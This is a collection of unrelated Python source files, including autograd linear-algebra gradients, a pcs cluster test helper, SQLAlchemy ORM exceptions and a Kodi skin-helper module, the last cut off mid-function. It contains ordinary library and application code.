def main():
ap = argparse.ArgumentParser()
sub = ap.add_subparsers()
latest = sub.add_parser("latest")
latest.set_defaults(func=lambda _opts: do_latest())
download = sub.add_parser("get_url")
download.set_defaults(
func=lambda _opts: get_download_url(os.environ['_3PP_VERSION']))
opts = ap.parse_args()
opts.func(opts)
if __name__ == '__main__':
main()
|
from __future__ import absolute_import
import numpy.linalg as npla
from .numpy_wrapper import wrap_namespace, dot
from . import numpy_wrapper as anp
wrap_namespace(npla.__dict__, globals())
def atleast_2d_col(x):
# Promotes a 1D array into a column rather than a row.
return x if x.ndim > 1 else x[:,None]
inv.defgrad( lambda ans, x : lambda g : -dot(dot(ans.T, g), ans.T))
det.defgrad( lambda ans, x : lambda g : g * ans * inv(x).T)
slogdet.defgrad(lambda ans, x : lambda g : g[1] * inv(x).T)
solve.defgrad( lambda ans, a, b : lambda g : -dot(atleast_2d_col(solve(a.T, g)),
atleast_2d_col(ans).T))
solve.defgrad(lambda ans, a, b : lambda g : solve(a.T, g), argnum=1)
norm.defgrad( lambda ans, a : lambda g : dot(g, a/ans))
def make_grad_eigh(ans, x, UPLO='L'):
"""Gradient for eigenvalues and vectors of a symmetric matrix."""
N = x.shape[0]
w, v = ans # Eigenvalues, eigenvectors.
def eigh_grad(g):
wg, vg = g # Gradient w.r.t. eigenvalues, eigenvectors.
w_repeated = anp.repeat(w[:, anp.newaxis], N, 1)
off_diag = anp.ones((N, N)) - anp.eye(N)
F = off_diag / (w_repeated.T - w_repeated + anp.eye(N))
dx = dot(v * wg + dot(v, F * dot(v.T, vg)), v.T)
if UPLO == 'U': # Reflect to account for symmetry.
return anp.triu(dx) + anp.tril(dx, -1).T
else:
return anp.tril(dx) + anp.triu(dx, 1).T
return eigh_grad
eigh.defgrad(make_grad_eigh)
|
from netforce.model import Model, fields, get_model
class BarcodeIssueLine(Model):
_name = "barcode.issue.line"
_transient = True
_fields = {
"wizard_id": fields.Many2One("barcode.issue", "Wizard", required=True, on_delete="cascade"),
"product_id": fields.Many2One("product", "Product", required=True),
"qty": fields.Decimal("Qty", required=True),
"uom_id": fields.Many2One("uom", "UoM", required=True),
"qty2": fields.Decimal("Secondary Qty"),
"lot_id": fields.Many2One("stock.lot", "Lot / Serial Number"),
"container_from_id": fields.Many2One("stock.container", "From Container"),
"container_to_id": fields.Many2One("stock.container", "To Container"),
"location_from_id": fields.Many2One("stock.location", "From Location"),
"location_to_id": fields.Many2One("stock.location", "To Location"),
"related_id": fields.Reference([["sale.order", "Sales Order"], ["purchase.order", "Purchase Order"]], "Related To"),
"qty2": fields.Decimal("Qty2"),
"notes": fields.Text("Notes"),
}
BarcodeIssueLine.register()
|
from txaws.server.method import Method
from txaws.server.tests.fixtures import method
@method
class TestMethod(Method):
pass
|
import clr
clr.AddReference('RevitAPI')
from Autodesk.Revit.DB import *
clr.AddReference("RevitServices")
import RevitServices
from RevitServices.Persistence import DocumentManager
from RevitServices.Transactions import TransactionManager
doc = DocumentManager.Instance.CurrentDBDocument
faminstances = UnwrapElement(IN[0])
booleans = []
TransactionManager.Instance.EnsureInTransaction(doc)
for item in faminstances:
try:
item.FlipFromToRoom()
booleans.append(True)
except:
booleans.append(False)
TransactionManager.Instance.TransactionTaskDone()
OUT = (faminstances,booleans)
|
import sys
from healthcareai.common.healthcareai_error import HealthcareAIError
def validate_pyodbc_is_loaded():
""" Simple check that alerts user if they are do not have pyodbc installed, which is not a requirement. """
if 'pyodbc' not in sys.modules:
raise HealthcareAIError('Using this function requires installation of pyodbc.')
def validate_sqlite3_is_loaded():
""" Simple check that alerts user if they are do not have sqlite installed, which is not a requirement. """
if 'sqlite3' not in sys.modules:
raise HealthcareAIError('Using this function requires installation of sqlite3.')
|
def deleteNoneSpacelstrip(str):
while(str.lstrip('\n') is not str):str = str.lstrip('\n')
while(str.lstrip('\t') is not str):str = str.lstrip('\t')
while(str.lstrip('\0') is not str):str = str.lstrip('\0')
while(str.lstrip('\n') is not str):str = str.lstrip('\n')
while(str.lstrip('\t') is not str):str = str.lstrip('\t')
while(str.lstrip('\0') is not str):str = str.lstrip('\0')
while(str.lstrip('\n') is not str):str = str.lstrip('\n')
while(str.lstrip('\t') is not str):str = str.lstrip('\t')
while(str.lstrip('\0') is not str):str = str.lstrip('\0')
while(str.lstrip(' ') is not str):str = str.lstrip(' ')
while(str.lstrip(' ') is not str):str = str.lstrip(' ')
while(str.lstrip(' ') is not str):str = str.lstrip(' ')
return str
|
'''OpenGL extension ARB.fragment_program
This module customises the behaviour of the
OpenGL.raw.GL.ARB.fragment_program to provide a more
Python-friendly API
Overview (from the spec)
Unextended OpenGL mandates a certain set of configurable per-
fragment computations defining texture application, texture
environment, color sum, and fog operations. Several extensions have
added further per-fragment computations to OpenGL. For example,
extensions have defined new texture environment capabilities
(ARB_texture_env_add, ARB_texture_env_combine, ARB_texture_env_dot3,
ARB_texture_env_crossbar), per-fragment depth comparisons
(ARB_depth_texture, ARB_shadow, ARB_shadow_ambient,
EXT_shadow_funcs), per-fragment lighting (EXT_fragment_lighting,
EXT_light_texture), and environment mapped bump mapping
(ATI_envmap_bumpmap).
Each such extension adds a small set of relatively inflexible per-
fragment computations.
This inflexibility is in contrast to the typical flexibility
provided by the underlying programmable floating point engines
(whether micro-coded fragment engines, DSPs, or CPUs) that are
traditionally used to implement OpenGL's texturing computations.
The purpose of this extension is to expose to the OpenGL application
writer a significant degree of per-fragment programmability for
computing fragment parameters.
For the purposes of discussing this extension, a fragment program is
a sequence of floating-point 4-component vector operations that
determines how a set of program parameters (not specific to an
individual fragment) and an input set of per-fragment parameters are
transformed to a set of per-fragment result parameters.
The per-fragment computations for standard OpenGL given a particular
set of texture and fog application modes (along with any state for
extensions defining per-fragment computations) is, in essence, a
fragment program. However, the sequence of operations is defined
implicitly by the current OpenGL state settings rather than defined
explicitly as a sequence of instructions.
This extension provides an explicit mechanism for defining fragment
program instruction sequences for application-defined fragment
programs. In order to define such fragment programs, this extension
defines a fragment programming model including a floating-point
4-component vector instruction set and a relatively large set of
floating-point 4-component registers.
The extension's fragment programming model is designed for efficient
hardware implementation and to support a wide variety of fragment
programs. By design, the entire set of existing fragment programs
defined by existing OpenGL per-fragment computation extensions can
be implemented using the extension's fragment programming model.
The official definition of this extension is available here:
http://www.opengl.org/registry/specs/ARB/fragment_program.txt
'''
from OpenGL import platform, constants, constant, arrays
from OpenGL import extensions, wrapper
from OpenGL.GL import glget
import ctypes
from OpenGL.raw.GL.ARB.fragment_program import *
from OpenGL.GL import glget
glget.addGLGetConstant( GL_FRAGMENT_PROGRAM_ARB, (1,) )
|
import base64
import json
from pcs_test.tools.command_env.mock_node_communicator import (
place_multinode_call,
)
class FilesShortcuts:
def __init__(self, calls):
self.__calls = calls
def put_files(
self,
node_labels=None,
pcmk_authkey=None,
corosync_authkey=None,
corosync_conf=None,
pcs_disaster_recovery_conf=None,
pcs_settings_conf=None,
communication_list=None,
name="http.files.put_files",
):
# pylint: disable=too-many-arguments
"""
Create a call for the files distribution to the nodes.
node_labels list -- create success responses from these nodes
pcmk_authkey bytes -- content of pacemaker authkey file
corosync_authkey bytes -- content of corosync authkey file
corosync_conf string -- content of corosync.conf
pcs_disaster_recovery_conf string -- content of pcs DR config
pcs_settings_conf string -- content of pcs_settings.conf
communication_list list -- create custom responses
name string -- the key of this call
"""
input_data = {}
output_data = {}
written_output_dict = dict(
code="written",
message="",
)
if pcmk_authkey:
file_id = "pacemaker_remote authkey"
input_data[file_id] = dict(
data=base64.b64encode(pcmk_authkey).decode("utf-8"),
type="pcmk_remote_authkey",
rewrite_existing=True,
)
output_data[file_id] = written_output_dict
if corosync_authkey:
file_id = "corosync authkey"
input_data[file_id] = dict(
data=base64.b64encode(corosync_authkey).decode("utf-8"),
type="corosync_authkey",
rewrite_existing=True,
)
output_data[file_id] = written_output_dict
if corosync_conf:
file_id = "corosync.conf"
input_data[file_id] = dict(
data=corosync_conf,
type="corosync_conf",
)
output_data[file_id] = written_output_dict
if pcs_disaster_recovery_conf:
file_id = "disaster-recovery config"
input_data[file_id] = dict(
data=base64.b64encode(pcs_disaster_recovery_conf).decode(
"utf-8"
),
type="pcs_disaster_recovery_conf",
rewrite_existing=True,
)
output_data[file_id] = written_output_dict
if pcs_settings_conf:
file_id = "pcs_settings.conf"
input_data[file_id] = dict(
data=pcs_settings_conf,
type="pcs_settings_conf",
rewrite_existing=True,
)
output_data[file_id] = written_output_dict
place_multinode_call(
self.__calls,
name,
node_labels,
communication_list,
action="remote/put_file",
param_list=[("data_json", json.dumps(input_data))],
output=json.dumps(dict(files=output_data)),
)
def remove_files(
self,
node_labels=None,
pcsd_settings=False,
pcs_disaster_recovery_conf=False,
communication_list=None,
name="http.files.remove_files",
):
"""
Create a call for removing the files on the nodes.
node_labels list -- create success responses from these nodes
pcsd_settings bool -- if True, remove file pcsd_settings
pcs_disaster_recovery_conf bool -- if True, remove pcs DR config
communication_list list -- create custom responses
name string -- the key of this call
"""
input_data = {}
output_data = {}
if pcsd_settings:
file_id = "pcsd settings"
input_data[file_id] = dict(type="pcsd_settings")
output_data[file_id] = dict(
code="deleted",
message="",
)
if pcs_disaster_recovery_conf:
file_id = "pcs disaster-recovery config"
input_data[file_id] = dict(type="pcs_disaster_recovery_conf")
output_data[file_id] = dict(
code="deleted",
message="",
)
place_multinode_call(
self.__calls,
name,
node_labels,
communication_list,
action="remote/remove_file",
param_list=[("data_json", json.dumps(input_data))],
output=json.dumps(dict(files=output_data)),
)
|
"""SQLAlchemy ORM exceptions."""
from .. import exc as sa_exc
from .. import util
NO_STATE = (AttributeError, KeyError)
"""Exception types that may be raised by instrumentation implementations."""
class StaleDataError(sa_exc.SQLAlchemyError):
"""An operation encountered database state that is unaccounted for.
Conditions which cause this to happen include:
* A flush may have attempted to update or delete rows
and an unexpected number of rows were matched during
the UPDATE or DELETE statement. Note that when
version_id_col is used, rows in UPDATE or DELETE statements
are also matched against the current known version
identifier.
* A mapped object with version_id_col was refreshed,
and the version number coming back from the database does
not match that of the object itself.
* A object is detached from its parent object, however
the object was previously attached to a different parent
identity which was garbage collected, and a decision
cannot be made if the new parent was really the most
recent "parent".
"""
ConcurrentModificationError = StaleDataError
class FlushError(sa_exc.SQLAlchemyError):
"""A invalid condition was detected during flush()."""
class UnmappedError(sa_exc.InvalidRequestError):
"""Base for exceptions that involve expected mappings not present."""
class ObjectDereferencedError(sa_exc.SQLAlchemyError):
"""An operation cannot complete due to an object being garbage
collected.
"""
class DetachedInstanceError(sa_exc.SQLAlchemyError):
"""An attempt to access unloaded attributes on a
mapped instance that is detached."""
code = "bhk3"
class UnmappedInstanceError(UnmappedError):
"""An mapping operation was requested for an unknown instance."""
@util.dependencies("sqlalchemy.orm.base")
def __init__(self, base, obj, msg=None):
if not msg:
try:
base.class_mapper(type(obj))
name = _safe_cls_name(type(obj))
msg = (
"Class %r is mapped, but this instance lacks "
"instrumentation. This occurs when the instance "
"is created before sqlalchemy.orm.mapper(%s) "
"was called." % (name, name)
)
except UnmappedClassError:
msg = _default_unmapped(type(obj))
if isinstance(obj, type):
msg += (
"; was a class (%s) supplied where an instance was "
"required?" % _safe_cls_name(obj)
)
UnmappedError.__init__(self, msg)
def __reduce__(self):
return self.__class__, (None, self.args[0])
class UnmappedClassError(UnmappedError):
"""An mapping operation was requested for an unknown class."""
def __init__(self, cls, msg=None):
if not msg:
msg = _default_unmapped(cls)
UnmappedError.__init__(self, msg)
def __reduce__(self):
return self.__class__, (None, self.args[0])
class ObjectDeletedError(sa_exc.InvalidRequestError):
"""A refresh operation failed to retrieve the database
row corresponding to an object's known primary key identity.
A refresh operation proceeds when an expired attribute is
accessed on an object, or when :meth:`_query.Query.get` is
used to retrieve an object which is, upon retrieval, detected
as expired. A SELECT is emitted for the target row
based on primary key; if no row is returned, this
exception is raised.
The true meaning of this exception is simply that
no row exists for the primary key identifier associated
with a persistent object. The row may have been
deleted, or in some cases the primary key updated
to a new value, outside of the ORM's management of the target
object.
"""
@util.dependencies("sqlalchemy.orm.base")
def __init__(self, base, state, msg=None):
if not msg:
msg = (
"Instance '%s' has been deleted, or its "
"row is otherwise not present." % base.state_str(state)
)
sa_exc.InvalidRequestError.__init__(self, msg)
def __reduce__(self):
return self.__class__, (None, self.args[0])
class UnmappedColumnError(sa_exc.InvalidRequestError):
"""Mapping operation was requested on an unknown column."""
class NoResultFound(sa_exc.InvalidRequestError):
"""A database result was required but none was found."""
class MultipleResultsFound(sa_exc.InvalidRequestError):
"""A single database result was required but more than one were found."""
class LoaderStrategyException(sa_exc.InvalidRequestError):
"""A loader strategy for an attribute does not exist."""
def __init__(
self,
applied_to_property_type,
requesting_property,
applies_to,
actual_strategy_type,
strategy_key,
):
if actual_strategy_type is None:
sa_exc.InvalidRequestError.__init__(
self,
"Can't find strategy %s for %s"
% (strategy_key, requesting_property),
)
else:
sa_exc.InvalidRequestError.__init__(
self,
'Can\'t apply "%s" strategy to property "%s", '
'which is a "%s"; this loader strategy is intended '
'to be used with a "%s".'
% (
util.clsname_as_plain_name(actual_strategy_type),
requesting_property,
util.clsname_as_plain_name(applied_to_property_type),
util.clsname_as_plain_name(applies_to),
),
)
def _safe_cls_name(cls):
try:
cls_name = ".".join((cls.__module__, cls.__name__))
except AttributeError:
cls_name = getattr(cls, "__name__", None)
if cls_name is None:
cls_name = repr(cls)
return cls_name
@util.dependencies("sqlalchemy.orm.base")
def _default_unmapped(base, cls):
try:
mappers = base.manager_of_class(cls).mappers
except NO_STATE:
mappers = {}
except TypeError:
mappers = {}
name = _safe_cls_name(cls)
if not mappers:
return "Class '%s' is not mapped" % name
|
'''
script.skin.helper.service
Helper service and scripts for Kodi skins
mainmodule.py
All script methods provided by the addon
'''
import xbmc
import xbmcvfs
import xbmcgui
import xbmcaddon
from skinsettings import SkinSettings
from simplecache import SimpleCache
from utils import log_msg, KODI_VERSION
from utils import log_exception, get_current_content_type, ADDON_ID, recursive_delete_dir
from dialogselect import DialogSelect
from xml.dom.minidom import parse
from metadatautils import KodiDb, process_method_on_list
import urlparse
import sys
class MainModule:
'''mainmodule provides the script methods for the skinhelper addon'''
def __init__(self):
'''Initialization and main code run'''
self.win = xbmcgui.Window(10000)
self.addon = xbmcaddon.Addon(ADDON_ID)
self.kodidb = KodiDb()
self.cache = SimpleCache()
self.params = self.get_params()
log_msg("MainModule called with parameters: %s" % self.params)
action = self.params.get("action", "")
# launch module for action provided by this script
try:
getattr(self, action)()
except AttributeError:
log_exception(__name__, "No such action: %s" % action)
except Exception as exc:
log_exception(__name__, exc)
finally:
xbmc.executebuiltin("dialog.Close(busydialog)")
# do cleanup
self.close()
def close(self):
'''Cleanup Kodi Cpython instances on exit'''
self.cache.close()
del self.win
del self.addon
del self.kodidb
log_msg("MainModule exited")
@classmethod
def get_params(self):
'''extract the params from the called script path'''
params = {}
for arg in sys.argv[1:]:
paramname = arg.split('=')[0]
paramvalue = arg.replace(paramname + "=", "")
paramname = paramname.lower()
if paramname == "action":
paramvalue = paramvalue.lower()
params[paramname] = paramvalue
return params
def deprecated_method(self, newaddon):
'''
used when one of the deprecated methods is called
print warning in log and call the external script with the same parameters
'''
action = self.params.get("action")
log_msg("Deprecated method: %s. Please call %s directly" % (action, newaddon), xbmc.LOGWARNING)
paramstring = ""
for key, value in self.params.iteritems():
paramstring += ",%s=%s" % (key, value)
if xbmc.getCondVisibility("System.HasAddon(%s)" % newaddon):
xbmc.executebuiltin("RunAddon(%s%s)" % (newaddon, paramstring))
else:
# trigger install of the addon
if KODI_VERSION > 16:
xbmc.executebuiltin("InstallAddon(%s)" % newaddon)
else:
xbmc.executebuiltin("RunPlugin(plugin://%s)" % newaddon)
@staticmethod
def musicsearch():
'''helper to go directly to music search dialog'''
xbmc.executebuiltin("ActivateWindow(Music)")
xbmc.executebuiltin("SendClick(8)")
def setview(self):
'''sets the selected viewmode for the container'''
xbmc.executebuiltin("ActivateWindow(busydialog)")
content_type = get_current_content_type()
if not content_type:
content_type = "files"
current_view = xbmc.getInfoLabel("Container.Viewmode").decode("utf-8")
view_id, view_label = self.selectview(content_type, current_view)
current_forced_view = xbmc.getInfoLabel("Skin.String(SkinHelper.ForcedViews.%s)" % content_type)
if view_id is not None:
# also store forced view
if (content_type and current_forced_view and current_forced_view != "None" and
xbmc.getCondVisibility("Skin.HasSetting(SkinHelper.ForcedViews.Enabled)")):
xbmc.executebuiltin("Skin.SetString(SkinHelper.ForcedViews.%s,%s)" % (content_type, view_id))
xbmc.executebuiltin("Skin.SetString(SkinHelper.ForcedViews.%s.label,%s)" % (content_type, view_label))
self.win.setProperty("SkinHelper.ForcedView", view_id)
if not xbmc.getCondVisibility("Control.HasFocus(%s)" % current_forced_view):
xbmc.sleep(100)
xbmc.executebuiltin("Container.SetViewMode(%s)" % view_id)
xbmc.executebuiltin("SetFocus(%s)" % view_id)
else:
self.win.clearProperty("SkinHelper.ForcedView")
# set view
xbmc.executebuiltin("Container.SetViewMode(%s)" % view_id)
def selectview(self, content_type="other", current_view=None, display_none=False):
'''reads skinfile with all views to present a dialog to choose from'''
cur_view_select_id = None
label = ""
all_views = []
if display_none:
listitem = xbmcgui.ListItem(label="None")
listitem.setProperty("id", "None")
all_views.append(listitem)
# read the special skin views file
views_file = xbmc.translatePath('special://skin/extras/views.xml').decode("utf-8")
if xbmcvfs.exists(views_file):
doc = parse(views_file)
listing = doc.documentElement.getElementsByTagName('view')
itemcount = 0
for view in listing:
label = xbmc.getLocalizedString(int(view.attributes['languageid'].nodeValue))
viewid = view.attributes['value'].nodeValue
mediatypes = view.attributes['type'].nodeValue.lower().split(",")
if label.lower() == current_view.lower() or viewid == current_view:
cur_view_select_id = itemcount
if display_none:
cur_view_select_id += 1
if (("all" in mediatypes or content_type.lower() in mediatypes) and
(not "!" + content_type.lower() in mediatypes) and not
xbmc.getCondVisibility("Skin.HasSetting(SkinHelper.view.Disabled.%s)" % viewid)):
image = "special://skin/extras/viewthumbs/%s.jpg" % viewid
listitem = xbmcgui.ListItem(label=label, iconImage=image)
listitem.setProperty("viewid", viewid)
listitem.setProperty("icon", image)
all_views.append(listitem)
itemcount += 1
dialog = DialogSelect("DialogSelect.xml", "", listing=all_views,
windowtitle=self.addon.getLocalizedString(32012), richlayout=True)
dialog.autofocus_id = cur_view_select_id
dialog.doModal()
result = dialog.result
del dialog
if result:
viewid = result.getProperty("viewid")
label = result.getLabel().decode("utf-8")
return (viewid, label)
else:
return (None, None)
# pylint: disable-msg=too-many-local-variables
def enableviews(self):
'''show select dialog to enable/disable views'''
all_views = []
views_file = xbmc.translatePath('special://skin/extras/views.xml').decode("utf-8")
richlayout = self.params.get("richlayout", "") == "true"
if xbmcvfs.exists(views_file):
doc = parse(views_file)
listing = doc.documentElement.getElementsByTagName('view')
for view in listing:
view_id = view.attributes['value'].nodeValue
label = xbmc.getLocalizedString(int(view.attributes['languageid'].nodeValue))
desc = label + " (" + str(view_id) + ")"
image = "special://skin/extras/viewthumbs/%s.jpg" % view_id
listitem = xbmcgui.ListItem(label=label, label2=desc, iconImage=image)
listitem.setProperty("viewid", view_id)
if not xbmc.getCondVisibility("Skin.HasSetting(SkinHelper.view.Disabled.%s)" % view_id):
listitem.select(selected=True)
excludefromdisable = False
try:
excludefromdisable = view.attributes['excludefromdisable'].nodeValue == "true"
except Exception:
pass
if not excludefromdisable:
all_views.append(listitem)
dialog = DialogSelect(
"DialogSelect.xml",
"",
listing=all_views,
windowtitle=self.addon.getLocalizedString(32013),
multiselect=True, richlayout=richlayout)
dialog.doModal()
result = dialog.result
del dialog
if result:
for item in result:
view_id = item.getProperty("viewid")
if item.isSelected():
# view is enabled
xbmc.executebuiltin("Skin.Reset(SkinHelper.view.Disabled.%s)" % view_id)
else:
# view is disabled
xbmc.executebuiltin("Skin.SetBool(SkinHelper.view.Disabled.%s)" % view_id)
# pylint: enable-msg=too-many-local-variables
def setforcedview(self):
'''helper that sets a forced view for a specific content type'''
content_type = self.params.get("contenttype")
if content_type:
current_view = xbmc.getInfoLabel("Skin.String(SkinHelper.ForcedViews.%s)" % content_type)
if not current_view:
current_view = "0"
view_id, view_label = self.selectview(content_type, current_view, True)
if view_id or view_label:
xbmc.executebuiltin("Skin.SetString(SkinHelper.ForcedViews.%s,%s)" % (content_type, view_id))
xbmc.executebuiltin("Skin.SetString(SkinHelper.ForcedViews.%s.label,%s)" % (content_type, view_label))
@staticmethod
def get_youtube_listing(searchquery):
'''get items from youtube plugin by query'''
lib_path = u"plugin://plugin.video.youtube/kodion/search/query/?q=%s" % searchquery
return KodiDb().files(lib_path)
def searchyoutube(self):
'''helper to search youtube for the given title'''
xbmc.executebuiltin("ActivateWindow(busydialog)")
title = self.params.get("title", "")
window_header = self.params.get("header", "")
results = []
for media in self.get_youtube_listing(title):
if not media["filetype"] == "directory":
label = media["label"]
label2 = media["plot"]
image = ""
if media.get('art'):
if media['art'].get('thumb'):
image = (media['art']['thumb'])
listitem = xbmcgui.ListItem(label=label, label2=label2, iconImage=image)
listitem.setProperty("path", media["file"])
results.append(listitem)
# finished lookup - display listing with results
xbmc.executebuiltin("dialog.Close(busydialog)")
dialog = DialogSelect("DialogSelect.xml", "", listing=results, windowtitle=window_header,
multiselect=False, richlayout=True)
dialog.doModal()
result = dialog.result
del dialog
if result:
if xbmc.getCondVisibility(
"Window.IsActive(script-skin_helper_service-CustomInfo.xml) | "
"Window.IsActive(movieinformation)"):
xbmc.executebuiltin("Dialog.Close(movieinformation)")
xbmc.executebuiltin("Dialog.Close(script-skin_helper_service-CustomInfo.xml)")
xbmc.sleep(1000)
xbmc.executebuiltin('PlayMedia("%s")' % result.getProperty("path"))
del result
def getcastmedia(self):
'''helper to show a dialog with all media for a specific actor'''
xbmc.executebuiltin("ActivateWindow(busydialog)")
name = self.params.get("name", "")
window_header = self.params.get("name", "")
results = []
items = self.kodidb.castmedia(name)
items = process_method_on_list(self.kodidb.prepare_listitem, items)
for item in items:
if item["file"].startswith("videodb://"):
item["file"] = "ActivateWindow(Videos,%s,return)" % item["file"]
else:
item["file"] = 'PlayMedia("%s")' % item["file"]
results.append(self.kodidb.create_listitem(item, False))
# finished lookup - display listing with results
xbmc.executebuiltin("dialog.Close(busydialog)")
dialog = DialogSelect("DialogSelect.xml", "", listing=results, windowtitle=window_header, richlayout=True)
dialog.doModal()
result = dialog.result
del dialog
if result:
while xbmc.getCondVisibility("System.HasModalDialog"):
xbmc.executebuiltin("Action(Back)")
xbmc.sleep(300)
xbmc.executebuiltin(result.getfilename())
del result
def setfocus(self):
'''helper to set focus on a list or control'''
control = self.params.get("control")
fallback = self.params.get("fallback")
position = self.params.get("position", "0")
relativeposition = self.params.get("relativeposition")
if relativeposition:
position = int(relativeposition) - 1
count = 0
if control:
while not xbmc.getCondVisibility("Control.HasFocus(%s)" % control):
if xbmc.getCondVisibility("Window.IsActive(busydialog)"):
xbmc.sleep(150)
continue
elif count == 20 or (xbmc.getCondVisibility(
"!Control.IsVisible(%s) | "
"!IntegerGreaterThan(Container(%s).NumItems,0)" % (control, control))):
if fallback:
xbmc.executebuiltin("Control.SetFocus(%s)" % fallback)
break
else:
xbmc.executebuiltin("Control.SetFocus(%s,%s)" % (control, position))
xbmc.sleep(50)
count += 1
def setwidgetcontainer(self):
'''helper that reports the current selected widget container/control'''
controls = self.params.get("controls", "").split("-")
if controls:
xbmc.sleep(50)
for i in range(10):
for control in controls:
if xbmc.getCondVisibility("Control.IsVisible(%s) + IntegerGreaterThan(Container(%s).NumItems,0)"
% (control, control)):
self.win.setProperty("SkinHelper.WidgetContainer", control)
return
xbmc.sleep(50)
self.win.clearProperty("SkinHelper.WidgetContainer")
def saveskinimage(self):
'''let the user select an image and save it to addon_data for easy backup'''
skinstring = self.params.get("skinstring", "")
allow_multi = self.params.get("multi", "") == "true"
header = self.params.get("header", "")
value = SkinSettings().save_skin_image(skinstring, allow_multi, header)
if value:
xbmc.executebuiltin("Skin.SetString(%s,%s)" % (skinstring.encode("utf-8"), value.encode("utf-8")))
@staticmethod
def checkskinsettings():
'''performs check of all default skin settings and labels'''
SkinSettings().correct_skin_settings()
def setskinsetting(self):
'''allows the user to set a skin setting with a select dialog'''
setting = self.params.get("setting", "")
org_id = self.params.get("id", "")
if "$" in org_id:
org_id = xbmc.getInfoLabel(org_id).decode("utf-8")
header = self.params.get("header", "")
SkinSettings().set_skin_setting(setting=setting, window_header=header, original_id=org_id)
def setskinconstant(self):
'''allows the user to set a skin constant with a select dialog'''
setting = self.params.get("setting", "")
value = self.params.get("value", "")
header = self.params.get("header", "")
SkinSettings().set_skin_constant(setting, header, value)
def setskinconstants(self):
'''allows the skinner to set multiple skin constants'''
settings = self.params.get("settings", "").split("|")
values = self.params.get("values", "").split("|")
SkinSettings().set_skin_constants(settings, values)
def setskinshortcutsproperty(self):
'''allows the user to make a setting for skinshortcuts using the special skinsettings dialogs'''
setting = self.params.get("setting", "")
prop = self.params.get("property", "")
header = self.params.get("header", "")
SkinSettings().set_skinshortcuts_property(setting, header, prop)
def togglekodisetting(self):
'''toggle kodi setting'''
settingname = self.params.get("setting", "")
cur_value = xbmc.getCondVisibility("system.getbool(%s)" % settingname)
if cur_value:
new_value = "false"
else:
new_value = "true"
xbmc.executeJSONRPC(
'{"jsonrpc":"2.0", "id":1, "method":"Settings.SetSettingValue","params":{"setting":"%s","value":%s}}' %
(settingname, new_value))
def setkodisetting(self):
'''set kodi setting'''
settingname = self.params.get("setting", "")
value = self.params.get("value", "")
is_int = False
try:
valueint = int(value)
is_int = True
del valueint
except Exception:
pass
if value.lower() == "true":
value = 'true'
elif value.lower() == "false":
value = 'false'
elif is_int:
value = '"%s"' % value
xbmc.executeJSONRPC('{"jsonrpc":"2.0", "id":1, "method":"Settings.SetSettingValue",\
"params":{"setting":"%s","value":%s}}' % (settingname, value))
def playtrailer(self):
'''auto play windowed trailer inside video listing'''
if not xbmc.getCondVisibility("Player.HasMedia | Container.Scrolling | Container.OnNext | "
"Container.OnPrevious | !IsEmpty(Window(Home).Property(traileractionbusy))"):
self.win.setProperty("traileractionbusy", "traileractionbusy")
widget_container = self.params.get("widgetcontainer", "")
trailer_mode = self.params.get("mode", "").replace("auto_", "")
allow_youtube = self.params.get("youtube", "") == "true"
if not trailer_mode:
trailer_mode = "windowed"
if widget_container:
widget_container_prefix = "Container(%s)." % widget_container
else:
widget_container_prefix = ""
li_title = xbmc.getInfoLabel("%sListItem.Title" % widget_container_prefix).decode('utf-8')
li_trailer = xbmc.getInfoLabel("%sListItem.Trailer" % widget_container_prefix).decode('utf-8')
if not li_trailer and allow_youtube:
youtube_result = self.get_youtube_listing("%s Trailer" % li_title)
if youtube_result:
li_trailer = youtube_result[0].get("file")
# always wait a bit to prevent trailer start playing when we're scrolling the list
xbmc.Monitor().waitForAbort(3)
if li_trailer and (li_title == xbmc.getInfoLabel("%sListItem.Title"
% widget_container_prefix).decode('utf-8')):
if trailer_mode == "fullscreen" and li_trailer:
xbmc.executebuiltin('PlayMedia("%s")' % li_trailer)
else:
xbmc.executebuiltin('PlayMedia("%s",1)' % li_trailer)
self.win.setProperty("TrailerPlaying", trailer_mode)
self.win.clearProperty("traileractionbusy")
def colorpicker(self):
'''legacy'''
self.deprecated_method("script.skin.helper.colorpicker")
def backup(self):
'''legacy'''
self.deprecated_method("script.skin.helper.skinbackup")
def restore(self):
'''legacy'''
self.deprecated_method("script.skin.helper.skinbackup")
def reset(self):
'''legacy'''
self.deprecated_method("script.skin.helper.skinbackup")
def colorthemes(self):
'''legacy'''
self.deprecated_method("script.skin.helper.skinbackup")
def createcolortheme(self):
'''legacy'''
self.deprecated_method("script.skin.helper.skinbackup")
def restorecolortheme(self):
'''legacy'''
self.deprecated_method("script.skin.helper.skinbackup")
def conditionalbackgrounds(self):
'''legacy'''
self.deprecated_method("script.skin.helper.backgrounds")
def splashscreen(self):
'''helper to show a user defined splashscreen in the skin'''
import time
splashfile = self.params.get("file", "")
duration = int(self.params.get("duration", 5))
if (splashfile.lower().endswith("jpg") or splashfile.lower().endswith("gif") or
splashfile.lower().endswith("png") or splashfile.lower().endswith("tiff")):
# this is an image file
self.win.setProperty("SkinHelper.SplashScreen", splashfile)
# for images we just wait for X seconds to close the splash again
start_time = time.time()
while (time.time() - start_time) <= duration:
xbmc.sleep(500)
else:
# for video or audio we have to wait for the player to finish...
xbmc.Player().play(splashfile, windowed=True)
xbmc.sleep(500)
while xbmc.getCondVisibility("Player.HasMedia"):
xbmc.sleep(150)
# replace startup window with home
startupwindow = xbmc.getInfoLabel("System.StartupWindow")
xbmc.executebuiltin("ReplaceWindow(%s)" % startupwindow)
autostart_playlist = xbmc.getInfoLabel("$ESCINFO[Skin.String(autostart_playlist)]")
if autostart_playlist:
xbmc.executebuiltin("PlayMedia(%s)" % autostart_playlist)
def videosearch(self):
'''show the special search dialog'''
xbmc.executebuiltin("ActivateWindow(busydialog)")
from resources.lib.searchdialog import SearchDialog
search_dialog = SearchDialog("script-skin_helper_service-CustomSearch.xml",
self.addon.getAddonInfo('path').decode("utf-8"), "Default", "1080i")
search_dialog.doModal()
del search_dialog
def showinfo(self):
'''shows our special videoinfo dialog'''
dbid = self.params.get("dbid", "")
dbtype = self.params.get("dbtype", "")
from infodialog import show_infodialog
show_infodialog(dbid, dbtype)
def deletedir(self):
'''helper to delete a directory, input can be normal filesystem path or vfs'''
del_path = self.params.get("path")
if del_path:
ret = xbmcgui.Dialog().yesno(heading=xbmc.getLocalizedString(122),
line1=u"%s[CR]%s" % (xbmc.getLocalizedString(125), del_path))
if ret:
success = recursive_delete_dir(del_path)
if success:
xbmcgui.Dialog().ok(heading=xbmc.getLocalizedString(19179),
line1=self.addon.getLocalizedString(32014))
else:
